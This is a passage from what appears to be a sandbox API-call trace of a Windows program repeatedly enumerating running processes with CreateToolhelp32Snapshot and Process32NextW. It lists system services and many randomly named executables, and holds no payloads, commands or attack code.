lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.265] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0135.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0135.331] CloseHandle (hObject=0xbc) returned 1 [0135.331] Sleep (dwMilliseconds=0x12c) [0135.660] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0135.665] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.666] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.667] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.668] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.669] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.670] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.671] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.672] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.673] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.674] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.675] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.676] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.677] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.678] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.679] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.681] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.687] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.688] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.689] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.690] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.692] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.693] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.711] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.714] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.715] CloseHandle (hObject=0xc4) returned 1 